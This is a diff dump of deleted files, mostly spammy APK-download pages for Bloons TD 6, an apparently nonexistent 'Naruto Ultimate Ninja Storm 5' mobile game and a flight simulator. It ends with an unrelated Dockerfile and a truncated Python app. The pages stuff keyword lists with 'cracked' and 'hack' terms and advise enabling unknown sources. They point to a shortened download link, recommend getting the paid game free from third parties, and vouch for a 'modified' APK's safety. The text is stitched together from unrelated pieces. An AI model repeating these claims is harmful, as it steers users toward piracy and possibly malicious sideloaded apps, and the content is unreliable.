      Congratulations, you have successfully downloaded Bloons TD 6 APK no mod for your Android device. Now you can enjoy this amazing game without spending any money.
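As an optional extra check before you install, you can verify that the file you downloaded is exactly the one the site published by comparing its SHA-256 checksum (when the site lists one). The snippet below is a minimal, illustrative Python sketch of that check; the file name and the expected checksum are placeholders, not real values for Bloons TD 6.

```python
import hashlib

# Placeholders - point these at your downloaded file and the checksum
# published by the download site, if it provides one.
apk_path = "bloons-td6-no-mod.apk"
expected_sha256 = "paste-the-published-checksum-here"

def sha256_of_file(path: str, chunk_size: int = 1024 * 1024) -> str:
    """Return the SHA-256 hex digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

actual = sha256_of_file(apk_path)
print("SHA-256:", actual)
print("Matches published checksum:", actual == expected_sha256.lower())
```

If the two values do not match, the file was corrupted or altered in transit and should not be installed.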

      -

      Tips and Tricks for Bloons TD 6

      -

      Bloons TD 6 is a game that requires strategy and skill to master. There are many factors that affect your performance, such as the map layout, the bloon types, the tower combinations, and more. To help you improve your game, here are some tips and tricks that you should know:

      -
        -
      • Place your hero monkeys early to level them up faster. Hero monkeys are powerful units that gain experience and unlock new abilities as they pop bloons. The sooner you place them on the map, the more experience they will get and the more useful they will be in later rounds.
      • -
      • Pay attention to the range and placement of your towers. Different towers have different ranges and attack patterns, which affect how they interact with bloons and other towers. For example, some towers can shoot over obstacles, while others cannot. Some towers can pop lead bloons, while others cannot. Some towers can hit camo bloons, while others cannot. You should place your towers strategically to cover as much area as possible and deal with different bloon types effectively.
      • -
      • Use military towers to deal with specific bloon types. Military towers are towers that use weapons or vehicles to attack bloons. They include sniper monkeys, bomb shooters, ice monkeys, helicopter pilots, mortar monkeys, engineer monkeys, dartling gunners, beast handlers, and Admiral Brickell Jr. These towers have special abilities or upgrades that can help you deal with certain bloon types that other towers may struggle with. For example, sniper monkeys can pop camo bloons from anywhere on the map; bomb shooters can pop black bloons with frag bombs; ice monkeys can freeze MOAB-class bloons with absolute zero; helicopter pilots can follow your mouse cursor or patrol a specific area; mortar monkeys can target any spot on the map; engineer monkeys can deploy sentry guns or overclock other towers; dartling gunners can fire a powerful laser beam or a barrage of rockets; beast handlers can summon a pack of wolves or a giant bear; and Admiral Brickell Jr. can launch torpedoes or a nuclear strike.
      • -
      • Use magic towers to buff your units. Magic towers are towers that use magic or supernatural powers to attack bloons. They include super monkeys, alchemists, druids, and Psi. These towers have abilities or upgrades that can buff your units or debuff the bloons. For example, super monkeys can become the sun god or the dark champion; alchemists can apply acid or plasma to your towers' projectiles; druids can generate extra cash or lives; and Psi can manipulate the bloons' speed or direction.
      • -
      • Check out the powers menu for helpful items. Powers are items that you can use during the game to give you an edge over the bloons. They include road spikes, monkey glue, monkey boost, thrifty, cash drop, banana farmer, portable lake, pontoon, camo trap, MOAB mine, MOAB assassin, MOAB glue, MOAB shove, super monkey storm, and tech bot. You can buy powers with monkey money or earn them from quests or events. You can also use insta-monkeys, which are pre-upgraded towers that you can place instantly on the map.
      • -
      -

      Bloons TD 6 is a game that requires you to think and plan ahead. By using these tips and tricks, you can improve your strategy and pop more bloons.

      -

      download bloons tower defense 6 apk without mod
      -how to download btd6 apk for android no mod
      -download latest version of bloons td 6 apk unmodded
      -where can I download bloons td 6 apk original
      -download bloons td 6 apk free no mod
      -download bloons td 6 apk full version no mod
      -download bloons td 6 apk from official site no mod
      -download bloons td 6 apk with obb file no mod
      -download bloons td 6 apk offline no mod
      -download bloons td 6 apk updated no mod
      -download bloons td 6 apk cracked no mod
      -download bloons td 6 apk safe no mod
      -download bloons td 6 apk legit no mod
      -download bloons td 6 apk hack free no mod
      -download bloons td 6 apk premium no mod
      -download bloons td 6 apk unlimited money no mod
      -download bloons td 6 apk pro no mod
      -download bloons td 6 apk unlocked no mod
      -download bloons td 6 apk mod free no root
      -download bloons td 6 apk mod menu no root
      -download bloons td 6 apk cheat engine no root
      -download bloons td 6 apk trainer no root
      -download bloons td 6 apk patcher no root
      -download bloons td 6 apk installer no root
      -download bloons td 6 apk generator no root
      -download bloons td 6 apk direct link no root
      -download bloons td 6 apk mirror link no root
      -download bloons td 6 apk mediafire link no root
      -download bloons td 6 apk mega link no root
      -download bloons td 6 apk google drive link no root
      -download bloons td 6 apk dropbox link no root
      -download bloons td 6 apk zippyshare link no root
      -download bloons td 6 apk reddit link no root
      -download bloons td 6 apk quora link no root
      -download bloons td 6 apk youtube link no root
      -download bloons td 6 apk review no root
      -download bloons td 6 apk guide no root
      -download bloons td 6 apk tutorial no root
      -download bloons td 6 apk tips and tricks no root
      -download bloons td 6 apk walkthrough no root
      -download bloons td 6 apk gameplay no root
      -download bloons td 6 apk best strategy no root
      -download bloons td 6 apk best towers no root
      -download bloons td 6 apk best upgrades no root
      -download bloons td 6 apk best heroes no root
      -download bloons td 6 apk best maps no root
      -download bloons td 6 apk best modes no root
      -download bloons td 6 apk best challenges no root
      -download bloons td 6 apk best achievements no root

      -

      Conclusion

      -

      Bloons TD 6 is a fun and challenging tower defense game that you can play on your Android device. It has many features and content that will keep you entertained for hours. You can download Bloons TD 6 APK no mod for free from a reliable source and install it on your device easily. You can also use some tips and tricks to help you master the game and pop more bloons. If you are looking for a game that combines 3D graphics, addictive gameplay, and diverse content, you should give Bloons TD 6 a try. You won't regret it.

      -

      FAQs

      -

      Here are some frequently asked questions about Bloons TD 6:

      -
        -
      1. Is Bloons TD 6 offline? Yes, you can play Bloons TD 6 offline without an internet connection. However, some features and content may require an internet connection, such as co-op mode, content browser, daily challenges, odysseys, quests, events, trophies, cloud save, and in-app purchases.
      2. -
      3. Is Bloons TD 6 free? No, Bloons TD 6 is not free on the Google Play Store. It costs $4.99 to buy the game. However, you can download Bloons TD 6 APK no mod for free from a third-party source if you don't want to pay for the game.
      4. -
      5. Is Bloons TD 6 modded? No, Bloons TD 6 APK no mod is not modded. It is the original version of the game without any modifications or cheats. If you want to play Bloons TD 6 with mods, you will need to find a different source for the APK file.
      6. -
      7. Is Bloons TD 6 safe? Yes, Bloons TD 6 is safe to play on your Android device. However, you should be careful when downloading the APK file from an unknown source, as it may contain viruses or malware that can harm your device. You should also scan the APK file with an antivirus app before installing it.
      8. -
      9. Is Bloons TD 6 fun? Yes, Bloons TD 6 is fun to play on your Android device. It has colorful graphics, addictive gameplay, and diverse content that will keep you entertained for hours. You can also play with your friends online or create your own challenges and odysseys using the content browser.
      10. -

      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Naruto Ultimate Ninja Storm 5 APK v2.0 for Android - Latest Version.md b/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Naruto Ultimate Ninja Storm 5 APK v2.0 for Android - Latest Version.md deleted file mode 100644 index 255747a64d7b2fcb8cf007292c02beb0e48a94e2..0000000000000000000000000000000000000000 --- a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Naruto Ultimate Ninja Storm 5 APK v2.0 for Android - Latest Version.md +++ /dev/null @@ -1,82 +0,0 @@ -
      -

      Naruto Ultimate Ninja Storm 5 APK Download V2.0 for Android

      -

      Are you a fan of Naruto, the popular manga and anime series? Do you want to experience the thrilling ninja action and adventure on your Android device? If yes, then you should download Naruto Ultimate Ninja Storm 5 APK, the latest version of the best-selling Naruto game franchise. In this article, we will tell you everything you need to know about this amazing game, including its features, how to download and install it, and some frequently asked questions.

      -

      Introduction

      -

      Naruto is one of the most popular and successful manga and anime series in the world, with millions of fans across the globe. The story follows Naruto Uzumaki, a young ninja who dreams of becoming the Hokage, the leader of his village. Along his journey, he meets many friends and foes, and faces many challenges and dangers. The series is known for its captivating plot, dynamic characters, and epic battles.

      -

      naruto ultimate ninja storm 5 apk download v2 0 apk for android


      Download File ✦✦✦ https://ssurll.com/2uNZ2z



      -

      What is Naruto Ultimate Ninja Storm 5?

      -

      Naruto Ultimate Ninja Storm 5 is a video game based on the Naruto series, developed by CyberConnect2 and published by Bandai Namco Entertainment. It is the fifth installment in the Naruto Ultimate Ninja Storm series, which started in 2008. The game features the original story of Naruto from the beginning to the end, as well as some original scenarios and characters. The game also covers the events of Boruto: Naruto Next Generations, the sequel to Naruto.

      -

      Why should you download Naruto Ultimate Ninja Storm 5 APK?

      -

      Naruto Ultimate Ninja Storm 5 APK is a modified version of the original game that allows you to play it on your Android device without any restrictions. You don't need to root your device or pay any money to enjoy this game. You can download it for free from a trusted source and install it easily on your device. By downloading Naruto Ultimate Ninja Storm 5 APK, you can enjoy the following benefits:

      -
        -
      • You can play the game offline without any internet connection.
      • -
      • You can access all the features and content of the game without any limitations.
      • -
      • You can unlock all the characters and customization options without any hassle.
      • -
      • You can update the game to the latest version without any problems.
      • -
      • You can play the game smoothly and without any lag or glitches.
      • -
      -

      Features of Naruto Ultimate Ninja Storm 5 APK

      -

      Naruto Ultimate Ninja Storm 5 APK is a feature-packed game that will keep you entertained for hours. Here are some of the main features of this game:

      -

      Stunning graphics and animations

      -

      The game boasts of high-quality graphics and animations that will make you feel like you are watching an anime episode. The game uses cel-shaded graphics that give it a unique and colorful look. The animations are fluid and realistic, especially during the cutscenes and battles. The game also has amazing sound effects and voice acting that add to the immersion.

      -

      Epic battles and gameplay modes

      -

      The game offers various gameplay modes that will suit your preferences and skills. You can choose from Story Mode, Adventure Mode, Free Battle Mode, Survival Mode, Tournament Mode, and more. Each mode has its own objectives and challenges that will test your abilities as a ninja. You can also customize your difficulty level and settings according to your liking.

      -

      The battles in this game are epic and exciting, as you can use various moves and techniques to defeat your opponents. You can use basic attacks, combos, throws, counters, dodges, chakra, jutsu, ultimate jutsu, awakening, and more. You can also switch between different characters during the battle and use their abilities. The game also features interactive environments that you can use to your advantage or disadvantage.

      -

      naruto ultimate storm apk for pc and mac with bluestacks
      -ultimate shippuden ninja impact storm apk free download filehippo
      -naruto shippuden ultimate ninja storm 5 mod apk android 1
      -download naruto ultimate ninja storm 5 v2 0 offline apk
      -naruto ultimate storm apk latest version 2023 update
      -how to install ultimate shippuden ninja impact storm apk on android
      -naruto ultimate ninja storm 5 apk obb data download for android
      -ultimate shippuden ninja impact storm apk mod unlimited money
      -naruto shippuden ultimate ninja storm 5 ppsspp iso download android
      -naruto ultimate storm apk gameplay and features review
      -ultimate shippuden ninja impact storm apk cheats and tips
      -naruto ultimate ninja storm 5 v2 0 apk requirements and compatibility
      -ultimate shippuden ninja impact storm apk best characters and skills
      -naruto shippuden ultimate ninja storm 5 android download apkpure
      -naruto ultimate storm apk download for windows 10 and macos
      -ultimate shippuden ninja impact storm apk download for ios and iphone
      -naruto ultimate ninja storm 5 v2 0 apk online multiplayer mode
      -ultimate shippuden ninja impact storm apk offline story mode
      -naruto shippuden ultimate ninja storm 5 mod apk rexdl
      -naruto ultimate storm apk graphics and sound quality comparison
      -ultimate shippuden ninja impact storm apk size and version information
      -naruto ultimate ninja storm 5 v2 0 apk new characters and costumes
      -ultimate shippuden ninja impact storm apk ratings and reviews by users
      -naruto shippuden ultimate ninja storm 5 android emulator for pc
      -naruto ultimate storm apk bugs and issues fix guide

      -

      Huge roster of characters and customization options

      -

      The game has a huge roster of characters that you can choose from, including Naruto, Sasuke, Sakura, Kakashi, Gaara, Itachi, Madara, Obito, Minato, Hinata, Boruto, Sarada, Mitsuki, and many more. You can also unlock and play as some of the legendary characters from the series, such as Hashirama, Tobirama, Hiruzen, Jiraiya, Tsunade, Orochimaru, and more. You can also customize your characters with various outfits, accessories, weapons, and items that you can obtain from the game or purchase with in-game currency.

      -

      Online multiplayer and co-op missions

      -

      The game also supports online multiplayer and co-op missions that you can play with your friends or other players around the world. You can join or create a lobby and invite up to three other players to join you in a team battle or a co-op mission. You can also chat with your teammates and communicate with them using voice chat or text chat. You can also compete with other players in ranked matches and leaderboards.

      -

      How to download and install Naruto Ultimate Ninja Storm 5 APK on your Android device

      -

      If you want to download and install Naruto Ultimate Ninja Storm 5 APK on your Android device, you need to follow these simple steps:

      -

      Step 1: Enable unknown sources on your device

      -

      Before you can install any APK file on your device, you need to enable unknown sources on your device. This will allow you to install apps from sources other than the Google Play Store. To do this, go to your device settings and look for security or privacy options. Then, find the option that says unknown sources or allow installation from unknown sources and enable it.

      -

      Step 2: Download the APK file from a trusted source

      -

      Next, you need to download the APK file of Naruto Ultimate Ninja Storm 5 from a trusted source. You can use the link provided below to download the file safely and securely. The file size is about 1.2 GB, so make sure you have enough space on your device and a stable internet connection.
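Because the file is large, it is worth confirming the free space before you start the download. Here is a small illustrative Python check; the 1.2 GB figure comes from the paragraph above, and the path is only an example of where a download folder might live.

```python
import shutil

required_gb = 1.2                               # approximate size of the APK mentioned above
download_dir = "/storage/emulated/0/Download"   # example path; use your own download folder

total, used, free = shutil.disk_usage(download_dir)
free_gb = free / (1024 ** 3)

print(f"Free space: {free_gb:.2f} GB")
print("Enough room for the download:", free_gb >= required_gb)
```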

      -

      Download Naruto Ultimate Ninja Storm 5 APK V2.0

      -

      Step 3: Locate and install the APK file on your device

      -

      After you have downloaded the APK file, you need to locate it on your device and install it. You can use any file manager app to find the file in your downloads folder or wherever you saved it. Then, tap on the file and follow the instructions on the screen to install it.

      -

      Step 4: Launch the game and enjoy

      -

      Once you have installed the game successfully, you can launch it from your app drawer or home screen. You may need to grant some permissions to the game for it to run properly. Then, you can enjoy playing Naruto Ultimate Ninja Storm 5 on your Android device.

      -

      Conclusion

      -

      Naruto Ultimate Ninja Storm 5 is a fantastic game that will satisfy any Naruto fan or anime lover. It has amazing graphics and animations, epic battles and gameplay modes, huge roster of characters and customization options, online multiplayer and co-op missions, and more. It is also easy to download and install on your Android device using Naruto Ultimate Ninja Storm 5 APK. So what are you waiting for? Download Naruto Ultimate Ninja Storm 5 APK now and experience the ultimate ninja adventure.

      -

      FAQs

      -

      Here are some of the frequently asked questions about Naruto Ultimate Ninja Storm 5 APK:

      -
        -
      • Is Naruto Ultimate Ninja Storm 5 APK safe to download?
      • -
      • Yes, Naruto Ultimate Ninja Storm 5 APK is safe to download as long as you use a trusted source like the one we provided above. The file is free from any viruses or malware that could harm your device.
      • -
      • Is Naruto Ultimate Ninja Storm 5 APK compatible with my device?
      • -
• Naruto Ultimate Ninja Storm 5 APK is compatible with most Android devices that run on Android 4.4 or higher. However, some devices may not support certain features or functions of the game due to hardware limitations or software issues. You can check the compatibility of your device by visiting the official website of the game or contacting the developer.
      • -
      • How can I update Naruto Ultimate Ninja Storm 5 APK?
      • -
      • You can update Naruto Ultimate Ninja Storm 5 APK by downloading and installing the latest version of the file from the same source you used before. You don't need to uninstall the previous version, as the new version will overwrite it. You can also check for updates from within the game settings.
      • -
      • Can I play Naruto Ultimate Ninja Storm 5 APK with a controller?
      • -
      • Yes, you can play Naruto Ultimate Ninja Storm 5 APK with a controller if your device supports it. You can connect your controller via Bluetooth or USB and configure the buttons and settings in the game options. You can also use an emulator app to play the game with a controller on your PC.
      • -
      • Can I play Naruto Ultimate Ninja Storm 5 APK with my friends?
      • -
      • Yes, you can play Naruto Ultimate Ninja Storm 5 APK with your friends online or offline. You can join or create a lobby and invite your friends to play with you in a team battle or a co-op mission. You can also play against your friends in a free battle mode or a tournament mode. You can also chat with your friends using voice chat or text chat.
      • -

      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Experience the thrill of flying with RFS - Real Flight Simulator download pesawat now!.md b/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Experience the thrill of flying with RFS - Real Flight Simulator download pesawat now!.md deleted file mode 100644 index cd3db7c4166321357ec6bbc3e6fe11ce0ad76c2b..0000000000000000000000000000000000000000 --- a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Experience the thrill of flying with RFS - Real Flight Simulator download pesawat now!.md +++ /dev/null @@ -1,178 +0,0 @@ -
      -

      How to Download Pesawat RFS Real Flight Simulator and Enjoy Its Amazing Features

      -

      If you are a fan of flight simulation games, you might have heard of Pesawat RFS Real Flight Simulator, a popular and realistic game that lets you fly in any part of the world and explore sceneries and airports in high resolution. In this article, we will show you how to download Pesawat RFS Real Flight Simulator on your device, and what are the features and reviews of this game.

      -

      download pesawat rfs real flight simulator


      Download File ••• https://ssurll.com/2uNXEa



      -

      What is Pesawat RFS Real Flight Simulator?

      -

      Pesawat RFS Real Flight Simulator is a flight simulator game developed by RORTOS, an Italian company that specializes in creating simulation games for mobile devices. The game was released in 2019 and has since gained a lot of popularity among flight enthusiasts and gamers alike.

      -

      A realistic and multiplayer flight simulator game

      -

      Pesawat RFS Real Flight Simulator is not just a game, but a simulation of real flying. You can choose from a variety of aircraft, from small planes to large jets, and fly them in different weather conditions, day and night cycles, and realistic physics. You can also interact with other pilots and air traffic controllers, chat with them, and join them in multiplayer mode.

      -

      A variety of aircraft, airports, and flight scenarios

      -

      Pesawat RFS Real Flight Simulator offers you a wide range of options to customize your flying experience. You can access thousands of community created liveries, or create your own, and apply them to your aircraft. You can also choose from over 35 HD airports, or over 14,000 LD airports (pro only), that are built down to the finest detail, with 3D buildings, vehicles, taxiways, runways, procedures, and air traffic. You can also fly in different regions of the world, from Europe to Asia, from America to Africa, and enjoy the satellite maps and heightmaps that provide high definition terrains.

      -

      A pro subscription with more benefits and options

      -

      Pesawat RFS Real Flight Simulator is free to download and play, but you can also upgrade to a pro subscription that gives you more benefits and options. With a pro subscription, you can access real time flights that are based on real data from over 40,000 flights every day. You can also create advanced flight plans with procedures for departure, arrival, approach, and transition. You can also use the ATC air traffic control feature that allows you to communicate with interactive multi voice ATC controllers. Moreover, you can enjoy the satellite terrain and heightmap features that provide high definition worldwide terrains (satellite data requires online connection to stream data).

      -

      download pesawat rfs real flight simulator mod apk
      -download pesawat rfs real flight simulator for pc
      -download pesawat rfs real flight simulator pro
      -download pesawat rfs real flight simulator gratis
      -download pesawat rfs real flight simulator terbaru
      -download pesawat rfs real flight simulator offline
      -download pesawat rfs real flight simulator full version
      -download pesawat rfs real flight simulator android
      -download pesawat rfs real flight simulator online
      -download pesawat rfs real flight simulator free
      -download pesawat rfs real flight simulator hack
      -download pesawat rfs real flight simulator update
      -download pesawat rfs real flight simulator unlimited money
      -download pesawat rfs real flight simulator premium
      -download pesawat rfs real flight simulator apk data
      -download pesawat rfs real flight simulator apk obb
      -download pesawat rfs real flight simulator latest version
      -download pesawat rfs real flight simulator unlocked
      -download pesawat rfs real flight simulator apk pure
      -download pesawat rfs real flight simulator mod menu
      -download pesawat rfs real flight simulator cheat
      -download pesawat rfs real flight simulator cracked
      -download pesawat rfs real flight simulator apk mod
      -download pesawat rfs real flight simulator windows 10
      -download pesawat rfs real flight simulator ios
      -download pesawat rfs real flight simulator mac
      -download pesawat rfs real flight simulator laptop
      -download pesawat rfs real flight simulator google play
      -download pesawat rfs real flight simulator bluestacks
      -download pesawat rfs real flight simulator review
      -download pesawat rfs real flight simulator gameplay
      -download pesawat rfs real flight simulator tips and tricks
      -download pesawat rfs real flight simulator liveries
      -download pesawat rfs real flight simulator multiplayer
      -download pesawat rfs real flight simulator tutorial
      -download pesawat rfs real flight simulator wiki
      -download pesawat rfs real flight simulator guide
      -download pesawat rfs real flight simulator features
      -download pesawat rfs real flight simulator system requirements
      -download pesawat rfs real flight simulator best settings
      -download pesawat rfs real flight simulator how to play
      -download pesawat rfs real flight simulator controls
      -download pesawat rfs real flight simulator cockpit view
      -download pesawat rfs real flight simulator atc voice
      -download pesawat rfs real flight simulator weather settings
      -download pesawat rfs real flight simulator realistic mode
      -download pesawat rfs real flight simulator custom planes
      -download pesawat rfs real flight simulator hd graphics

      -

      How to Download Pesawat RFS Real Flight Simulator on Your Device?

      -

      Pesawat RFS Real Flight Simulator is available for Android, iOS, and PC devices. Here are the steps to download it on your device:

      -

      For Android users

      -

      If you have an Android device, you can download Pesawat RFS Real Flight Simulator from the Google Play Store. Here are the steps:

      -
        -
      1. Open the Google Play Store app on your device.
      2. -
      3. Search for Pesawat RFS Real Flight Simulator in the search bar.
      4. -
      5. Select the game from the list of results and tap on Install.
      6. -
      7. Wait for the game to download and install on your device.
      8. -
      9. Open the game and enjoy flying.
      10. -
      -

      For iOS users

      -

      If you have an iOS device, you can download Pesawat RFS Real Flight Simulator from the App Store. Here are the steps:

      -
        -
      1. Open the App Store app on your device.
      2. -
      3. Search for Pesawat RFS Real Flight Simulator in the search bar.
      4. -
      5. Select the game from the list of results and tap on Get.
      6. -
      7. Enter your Apple ID password or use Touch ID or Face ID to confirm the download.
      8. -
      9. Wait for the game to download and install on your device.
      10. -
      11. Open the game and enjoy flying.
      12. -
      -

      For PC users

      -

      If you have a PC, you can download Pesawat RFS Real Flight Simulator from the Microsoft Store. Here are the steps:

      -
        -
      1. Open the Microsoft Store app on your PC.
      2. -
      3. Search for Pesawat RFS Real Flight Simulator in the search bar.
      4. -
      5. Select the game from the list of results and click on Get.
      6. -
      7. Sign in with your Microsoft account if prompted.
      8. -
      9. Wait for the game to download and install on your PC.
      10. -
      11. Open the game and enjoy flying.
      12. -
      -

      What are the Features of Pesawat RFS Real Flight Simulator?

      -

      Pesawat RFS Real Flight Simulator is a game that offers you a lot of features to make your flying experience more realistic and enjoyable. Here are some of the features that you can find in this game:

      -

      Advanced multi panel system and customizable instruments

      -

Pesawat RFS Real Flight Simulator allows you to control your aircraft with an advanced multi panel system that includes navigation, engine, fuel, electrical, hydraulic, pressurization, communication, flight plan, S-TEC 55, FMS, GPS, and more. You can also customize your instruments by choosing from over 40 available panels, and on PC you can use a joystick or a yoke to control your aircraft.

      -

      High definition satellite terrains and 3D buildings

      -

      Pesawat RFS Real Flight Simulator provides you with high definition satellite terrains that cover the whole world. You can see the details of mountains, rivers, lakes, roads, cities, and more. You can also see 3D buildings that add realism to your flights. You can adjust the level of detail and quality of the graphics according to your device's performance.

      -

      Real time flights and air traffic control

      -

      Pesawat RFS Real Flight Simulator lets you fly in real time with real flights that are based on real data from over 40,000 flights every day (pro only). You can see other planes flying around you and interact with them. You can also use the ATC air traffic control feature that allows you to communicate with interactive multi voice ATC controllers (pro only). You can request takeoff clearance, taxi instructions, landing clearance, flight information, emergency assistance, and more.

      -

      Multiplayer mode and community liveries

      -

      Pesawat RFS Real Flight Simulator enables you to fly with other pilots from around the world in multiplayer mode. You can chat with them, join them in formation flights, or challenge them in races. You can also access thousands of community created liveries, or create your own, and apply them to your aircraft. You can share your liveries with other players and download theirs as well.

      -

      Failures, weather, and flight plan options

      -

      Pesawat RFS Real Flight Simulator gives you more options to customize your flights according to your preferences and skills. You can set up different failures that affect your aircraft's performance and systems, such as engine failure, fuel leak, fire, landing gear malfunction, bird strike, etc. You can also choose from different weather conditions that affect your visibility and wind direction and speed. You can also create advanced flight plans with procedures for departure, arrival, approach, and transition (pro only).

      -

      What are the Reviews of Pesawat RFS Real Flight Simulator?

      -

      Pesawat RFS Real Flight Simulator has received a lot of reviews from users who have downloaded and played it. Here are some of the reviews that you can find on the Google Play Store, App Store, and Microsoft Store:

      -

      Positive reviews from satisfied users

      -

      Pesawat RFS Real Flight Simulator has received a lot of positive reviews from users who have enjoyed the game and its features. Here are some of the positive reviews that you can find on the Google Play Store, App Store, and Microsoft Store:

      - - - - - - - - - - - - - - - - - - - - - -
| Platform | Review | Rating |
| --- | --- | --- |
| Google Play Store | "This is the best flight simulator game I have ever played. The graphics are amazing, the controls are smooth, and the multiplayer mode is fun. I love the real time flights and the ATC feature. I highly recommend this game to anyone who loves flying." | 5 stars |
| App Store | "I am a real pilot and I must say this game is very realistic and accurate. The physics, the instruments, the procedures, everything is well done. The game is also very challenging and rewarding. You can learn a lot from this game." | 5 stars |
| Microsoft Store | "This game is awesome. It has everything you need to simulate a real flight. The scenery, the weather, the traffic, the failures, the liveries, the flight plans, everything. The game is also very stable and runs smoothly on my PC." | 5 stars |
      -

      Negative reviews from disappointed users

      -

      Pesawat RFS Real Flight Simulator has also received some negative reviews from users who have encountered some issues or problems with the game. Here are some of the negative reviews that you can find on the Google Play Store, App Store, and Microsoft Store:

      - - - - - - - - - - - - - - - - - - - - - -
| Platform | Review | Rating |
| --- | --- | --- |
| Google Play Store | "This game is a rip off. It is too expensive to buy the pro subscription and it is not worth it. The game is full of bugs and glitches. The graphics are poor, the controls are hard, and the multiplayer mode is laggy. I regret buying this game." | 1 star |
| App Store | "This game is a waste of time and money. It crashes all the time and it does not save your progress. The game is also very boring and repetitive. There is nothing to do except flying around in circles. The game is also very unrealistic and inaccurate." | 1 star |
| Microsoft Store | "This game is a joke. It does not work on my PC at all. It freezes, crashes, and shuts down my PC every time I try to play it. The game is also very poorly optimized and requires a lot of resources to run. The game is also very outdated and lacks many features." | 1 star |
      -

      Tips and suggestions from experienced players

      -

      Pesawat RFS Real Flight Simulator has also received some tips and suggestions from experienced players who have shared their knowledge and advice with other users. Here are some of the tips and suggestions that you can find on the Google Play Store, App Store, and Microsoft Store:

      -
        -
      • "If you want to improve your flying skills, you should watch some tutorials on YouTube or read some guides on the wiki page of the game. They will help you understand how to use the instruments, how to follow the procedures, how to communicate with ATC, etc."
      • -
      • "If you want to have more fun with the game, you should join some groups or communities on social media or Discord. They will help you find other players to fly with, share your liveries with, or join some events or challenges with."
      • -
      • "If you want to have more options with the game, you should buy the pro subscription or some in-app purchases. They will give you access to more features, such as real time flights, satellite terrains, advanced flight plans, ATC controllers, etc."
      • -
      • "If you want to have more realism with the game, you should use a joystick or a yoke to control your aircraft (PC only). They will give you more precision and feedback than using a keyboard or a mouse."
      • -
      • "If you want to have more feedback with the game, you should rate it and write a review on the store where you downloaded it. They will help the developers improve the game and fix any issues or problems that you might have."
      • -
      -

      Conclusion

      -

      Pesawat RFS Real Flight Simulator is a flight simulator game that offers you a realistic and multiplayer flying experience in any part of the world. You can download it for free on your Android, iOS, or PC device, and enjoy its amazing features, such as advanced multi panel system, high definition satellite terrains, real time flights, multiplayer mode, failures, weather, and flight plan options. You can also upgrade to a pro subscription that gives you more benefits and options, such as satellite heightmaps, real time ATC controllers, and advanced flight plans. Pesawat RFS Real Flight Simulator has received a lot of reviews from users who have shared their opinions, experiences, tips, and suggestions about the game. If you are looking for a flight simulator game that is realistic, challenging, and fun, you should try Pesawat RFS Real Flight Simulator and see for yourself.

      -

      FAQs

      -

      Here are some of the frequently asked questions about Pesawat RFS Real Flight Simulator:

      -

      Q: How much does the pro subscription cost?

      -

      A: The pro subscription costs $0.99 per week, $4.99 per month, or $49.99 per year. You can cancel it anytime you want.
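For a rough comparison of what those plans add up to over a full year (plain arithmetic on the prices quoted above, ignoring promotions or regional pricing):

```python
weekly, monthly, yearly = 0.99, 4.99, 49.99

print(f"Weekly plan kept for a year:  ${weekly * 52:.2f}")   # about $51.48
print(f"Monthly plan kept for a year: ${monthly * 12:.2f}")  # about $59.88
print(f"Yearly plan:                  ${yearly:.2f}")
```

On those numbers, the yearly plan is the cheapest way to keep the subscription for a whole year, and the monthly plan is the most expensive.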

      -

      Q: How can I create my own liveries?

      -

      A: You can create your own liveries by using the livery editor feature in the game. You can access it by tapping on the aircraft icon on the main menu and then tapping on the paintbrush icon. You can choose from different colors, patterns, stickers, logos, and texts to customize your aircraft.

      -

      Q: How can I join multiplayer mode?

      -

      A: You can join multiplayer mode by tapping on the multiplayer icon on the main menu and then choosing a server to join. You can also create your own server by tapping on the plus icon and setting up your own rules and options.

      -

      Q: How can I communicate with ATC controllers?

      -

      A: You can communicate with ATC controllers by using the ATC feature in the game (pro only). You can access it by tapping on the ATC icon on the top right corner of the screen and then choosing a frequency to tune in. You can then use the buttons to request or respond to ATC instructions.

      -

      Q: How can I report a bug or a problem with the game?

      -

      A: You can report a bug or a problem with the game by contacting the developers through their email address (rfs@rortos.com) or their social media accounts (Facebook, Twitter, Instagram). You can also use the feedback feature in the game by tapping on the settings icon on the main menu and then tapping on feedback.

      -
      -
      \ No newline at end of file diff --git a/spaces/skylarx2x/openai-reverse-proxy/Dockerfile b/spaces/skylarx2x/openai-reverse-proxy/Dockerfile deleted file mode 100644 index 6953fc05439efb70991552cf56f28365b5b6c15b..0000000000000000000000000000000000000000 --- a/spaces/skylarx2x/openai-reverse-proxy/Dockerfile +++ /dev/null @@ -1,11 +0,0 @@ -FROM node:18 - -WORKDIR /app - -RUN npm install express express-http-proxy - -COPY . . - -EXPOSE 7860 - -CMD [ "node", "server.js" ] \ No newline at end of file diff --git a/spaces/smangrul/Text-To-Image/app.py b/spaces/smangrul/Text-To-Image/app.py deleted file mode 100644 index 558c0a54ebc43ab69e502039dbf2019fc0bbb4ab..0000000000000000000000000000000000000000 --- a/spaces/smangrul/Text-To-Image/app.py +++ /dev/null @@ -1,114 +0,0 @@ - -import gradio as gr -import torch -from transformers import AutoModelForSequenceClassification -from transformers import AutoTokenizer -from transformers import pipeline - -import torch -import os -import numpy as np -from matplotlib import pyplot as plt -from PIL import Image - -from pytorch_pretrained_biggan import BigGAN, truncated_noise_sample, one_hot_from_names, one_hot_from_int - -config = { - "model_name": "smangrul/Multimodal-Challenge", - "base_model_name": "distilbert-base-uncased", - "image_gen_model": "biggan-deep-128", - "max_length": 20, - "freeze_text_model": True, - "freeze_image_gen_model": True, - "text_embedding_dim": 768, - "class_embedding_dim": 128 -} -truncation=0.4 - -is_gpu = False -device = torch.device('cuda') if is_gpu else torch.device('cpu') -print(device) - -model = AutoModelForSequenceClassification.from_pretrained(config["model_name"], use_auth_token=os.environ.get( - 'huggingface-api-token')) -tokenizer = AutoTokenizer.from_pretrained(config["base_model_name"]) -model.to(device) -model.eval() - -gan_model = 